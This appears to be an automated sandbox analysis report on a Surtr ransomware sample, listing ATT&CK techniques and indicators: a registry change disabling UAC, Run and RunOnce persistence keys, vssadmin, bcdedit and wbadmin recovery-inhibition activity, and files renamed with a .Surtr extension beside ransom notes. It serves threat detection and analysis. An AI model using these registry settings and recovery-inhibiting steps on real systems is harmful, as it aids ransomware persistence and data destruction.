surtr | 7f5500562fc0e7350550841de9333f51b21c79e3a395558d397d356e1bb29f5e

Data Destruction

T1485

pid	Process
2924	fsutil.exe

Detects Surtr Payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0001000000022e02-196.dat	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

pid	Process
2152	bcdedit.exe
5048	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

pid	Process
4500	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\V:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\A:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\R:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\X:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\B:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\L:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\T:	cmd.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\E:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\U:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\W:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\Y:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\Z:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\F:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\M:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\H:	cmd.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\K:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\A:	svchost.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\THMBNAIL.PNG.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-text.jar	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ul-oob.xrm-ms.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-ppd.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-pl.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\POWERMAPCLASSIFICATION.DLL	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\wordvisi.ttf	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Grace-ul-oob.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_BypassTrial180-ppd.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription3-pl.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ppd.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ALRTINTL.DLL.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-pl.xrm-ms.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ul-oob.xrm-ms.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Common Files\microsoft shared\VGX\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\javacpl.cpl.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-pl.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-pl.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN082.XML.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav.xml.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\amd64\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-pl.xrm-ms.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN058.XML	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\index.win32.bundle.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-140.png.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.White.png.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\sv-SE\PrivateData_ocsrbkxk57oqbr.surt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ul-phn.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-ul-oob.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-dialogs.jar.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL087.XML	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PREVIEWTEMPLATE2.POTX.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\PrivateData_ocsrbkxk57oqbr.surt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_KMS_Client_AE-ul.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription4-ul-oob.xrm-ms.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\th-TH\	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar.[[email protected]].[ocsrbkxk57oqbr].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\c2rpridslicensefiles_auto.xml	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Grace-ppd.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-pl.xrm-ms	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL117.XML	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
4744	schtasks.exe
4796	schtasks.exe

Interacts with shadow copies 2 TTPs 51 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

pid	Process
5412	vssadmin.exe
4288	vssadmin.exe
4280	vssadmin.exe
5676	vssadmin.exe
3532	vssadmin.exe
2236	vssadmin.exe
1900	vssadmin.exe
4324	vssadmin.exe
5840	vssadmin.exe
3676	vssadmin.exe
5740	vssadmin.exe
5132	vssadmin.exe
5832	vssadmin.exe
4692	vssadmin.exe
3576	vssadmin.exe
2648	vssadmin.exe
732	vssadmin.exe
4188	vssadmin.exe
2268	vssadmin.exe
4996	vssadmin.exe
3532	vssadmin.exe
1876	vssadmin.exe
4324	vssadmin.exe
3996	vssadmin.exe
3392	vssadmin.exe
3028	vssadmin.exe
3476	vssadmin.exe
1556	vssadmin.exe
3232	vssadmin.exe
4884	vssadmin.exe
4216	vssadmin.exe
4948	vssadmin.exe
3836	vssadmin.exe
2768	vssadmin.exe
5548	vssadmin.exe
3696	vssadmin.exe
3844	vssadmin.exe
2492	vssadmin.exe
1252	vssadmin.exe
6072	vssadmin.exe
1860	vssadmin.exe
1112	vssadmin.exe
5144	vssadmin.exe
3972	vssadmin.exe
224	vssadmin.exe
5128	vssadmin.exe
3424	vssadmin.exe
3024	vssadmin.exe
1248	vssadmin.exe
1912	vssadmin.exe
4868	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
